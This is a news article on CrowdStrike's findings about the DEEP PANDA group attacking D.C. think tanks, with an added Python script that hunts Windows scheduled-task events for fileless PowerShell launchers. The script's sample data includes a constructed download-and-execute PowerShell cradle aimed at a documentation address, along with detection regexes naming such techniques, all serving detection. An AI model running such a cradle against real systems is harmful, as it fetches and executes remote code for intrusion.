The folks over at CrowdStrike have dug deep into a campaign of targeted cyber attacks on Washington D.C. think tanks and say they have evidence that whoever is behind the attacks has taken a sudden interest in U.S. policy towards Iraq.
Editor’s Note: This story was updated to include comments from Adam Meyers, Vice President of Security Intelligence at CrowdStrike. – PFR July 8, 2014 14:30
Writing on Tuesday, CrowdStrike CTO Dmitri Alperovitch described a new campaign by a group the company has dubbed “DEEP PANDA” that was targeting think tanks specializing in U.S. foreign policy and national security. Alperovitch said CrowdStrike observed a pronounced shift in targets in recent weeks, from think tank experts on Asia to experts on Iraq and the Middle East. The shift corresponded with the rapid escalation of violence in Iraq as the Islamic extremist group ISIS took control of large parts of the country.
“This actor, who was engaged in targeting and collection of Southeast Asia policy information, suddenly began targeting individuals with a tie to Iraq/Middle East issues,” Alperovitch wrote. “This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country.”
The group that CrowdStrike believes is behind the attacks, DEEP PANDA, has been operating for at least three years and has a reputation for stealth and sophistication, Alperovitch wrote. Past targets have included government, defense, financial, legal and telecommunications organizations. Previous reports by the company (PDF) have labeled DEEP PANDA a state-sponsored hacking group operating from the People’s Republic of China.
In attacks on the think tanks, the DEEP PANDA hackers used stolen user credentials to gain access to local hosts on the target network, and used SQL injection and other remote attacks on public-facing infrastructure to gain access to the vendor network. They then used PowerShell scripts deployed as scheduled tasks on the compromised hosts to move laterally within the target network, said Adam Meyers, the Vice President of Security Intelligence at CrowdStrike. Using PowerShell allowed the group to avoid placing an executable file on the target machine, a step that risked being noticed by antivirus software.
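Meyers’ description of PowerShell deployed as scheduled tasks points at one place a defender can look: Windows Security Event ID 4698 records every newly created scheduled task together with its full XML definition, including the command and arguments the task will run. The following is an added example, not code from CrowdStrike or from this article, that parses such records and flags tasks launching PowerShell with encoded or download-and-execute arguments, the fileless pattern Meyers describes. The event records, task names, user name, the 192.0.2.10 address and the download cradle text are all constructed sample data.

```python
"""Hunt for fileless PowerShell persistence in Windows Security event exports.

Added example, not CrowdStrike's tooling. Parses Event ID 4698
("A scheduled task was created") records, extracts the task definition XML
from the TaskContent field, and flags tasks whose action launches PowerShell
with encoded or download-and-execute arguments, i.e. the script body runs in
memory and no executable is written to disk.
"""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Argument fragments typical of an in-memory download cradle.
SUSPICIOUS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|"
    r"FromBase64String|-nop\b|-noprofile|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand followed by the base64 payload.
ENCODED_FLAG = re.compile(
    r"-e(?:c|nc(?:odedcommand)?)?\s+(?P<b64>[A-Za-z0-9+/=]+)", re.IGNORECASE
)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def parse_4698(event_xml: str):
    """Return (task_name, command, arguments) for a 4698 event, else None."""
    ev = ET.fromstring(event_xml)
    if ev.findtext(f"{EVT_NS}System/{EVT_NS}EventID") != "4698":
        return None
    data = {d.get("Name"): (d.text or "") for d in ev.iter(f"{EVT_NS}Data")}
    # Real TaskContent starts with an encoding="UTF-16" declaration that
    # ElementTree rejects on str input, so drop the declaration first.
    task_xml = re.sub(r"^\s*<\?xml[^>]*\?>", "", data.get("TaskContent", ""))
    if not task_xml:
        return None
    exec_ = ET.fromstring(task_xml).find(f"{TASK_NS}Actions/{TASK_NS}Exec")
    if exec_ is None:
        return None
    return (
        data.get("TaskName", ""),
        exec_.findtext(f"{TASK_NS}Command", default="").strip().strip('"'),
        exec_.findtext(f"{TASK_NS}Arguments", default=""),
    )


def classify(task) -> list:
    """Label one parsed task; an empty list means not a PowerShell launcher."""
    _name, command, args = task
    exe = command.rsplit("\\", 1)[-1].lower()
    if exe not in ("powershell.exe", "powershell", "pwsh.exe", "pwsh"):
        return []
    findings = ["powershell-launcher"]
    match = ENCODED_FLAG.search(args)
    decoded = decode_encoded_command(match.group("b64")) if match else ""
    if match:
        findings.append("encoded-command")
    if SUSPICIOUS.search(args) or SUSPICIOUS.search(decoded):
        findings.append("download-cradle")
    return findings


def hunt(events) -> dict:
    """Map task name -> findings for every PowerShell-launching task."""
    results = {}
    for xml_text in events:
        task = parse_4698(xml_text)
        if task and (findings := classify(task)):
            results[task[0]] = findings
    return results


def _event(task_name: str, command: str, arguments: str) -> str:
    """Build a constructed 4698 record (demo data, not a real log)."""
    task_xml = (
        f'<Task version="1.2" xmlns="{TASK_NS[1:-1]}"><Actions Context="Author">'
        f"<Exec><Command>{escape(command)}</Command>"
        f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>"
    )
    return (
        f'<Event xmlns="{EVT_NS[1:-1]}"><System><EventID>4698</EventID>'
        "<Computer>WS-ANALYST01</Computer></System><EventData>"
        '<Data Name="SubjectUserName">jdoe</Data>'
        f'<Data Name="TaskName">{escape(task_name)}</Data>'
        f'<Data Name="TaskContent">{escape(task_xml)}</Data></EventData></Event>'
    )


# 192.0.2.10 is a documentation address; the cradle text is constructed.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    _event(r"\Microsoft\Windows\Maintenance\NightlyBackup",
           r"C:\Windows\System32\cmd.exe", r"/c C:\Scripts\nightly_backup.bat"),
    _event(r"\Microsoft\Windows\Update\SvcRefresh", PS, f"-NoP -W Hidden -Enc {ENCODED}"),
    _event(r"\Adobe Flash Refresh", PS, f'-nop -w hidden -c "{CRADLE}"'),
    _event(r"\Microsoft\Windows\LogRotate", PS, r"-File C:\Scripts\Rotate-Logs.ps1"),
]

if __name__ == "__main__":
    for name, findings in hunt(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(findings)}")
```

Two caveats for anyone running this against real exports: the TaskContent field in a genuine 4698 event opens with an XML declaration that declares encoding="UTF-16", which ElementTree refuses on a Python string, so the script strips the declaration before parsing; and a task that merely runs an existing .ps1 file (the LogRotate sample) is reported only as a PowerShell launcher, so in practice you would pair this with Event ID 4702 (task updated) and PowerShell script block logging (Event ID 4104) to see what such a script actually executes.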
Other tools used in the hacks included a .NET executable, typically named Wafer, which in turn downloads and runs the MadHatter .NET Remote Access Tool (RAT), a DEEP PANDA favorite.
The group’s malicious tools typically run in memory on compromised machines, making them difficult to detect by forensic examiners, said Meyers.
“We’ve seen them use a four-byte or five-byte backdoor. It’s literally just a few lines of code,” he said. “These guys are pretty slick. They’re definitely players.”
The attackers targeted specific experts within the think tanks, using malware to collect and exfiltrate Microsoft Word and PowerPoint files, among others. Meyers said the attackers have also been observed moving from high-profile think tank employees to other targets within government agencies such as the Department of Defense and the Department of State.
The goal, said Alperovitch, was to gain insight into possible U.S. moves in Iraq. China has become a major investor in Iraq’s oil sector in the years since the U.S. invasion of the country and the overthrow of Saddam Hussein.
Meyers said that the targets in the latest attacks are almost all Washington D.C. “Beltway” area think tanks. CrowdStrike was already working with many of the think tanks on a pro bono basis, because they are frequent targets of attacks, but typically lack the budget for expensive cyber security and remediation services.
However, the attacks are not limited to think tanks. Meyers said law firms doing business on behalf of competitors to mainland Chinese firms, or engaged in international litigation, should be concerned about similar attacks. “We’ve seen them really touching all things China related,” he said.
Read more about CrowdStrike’s research here: Deep in Thought: Chinese Targeting of National Security Think Tanks (CrowdStrike).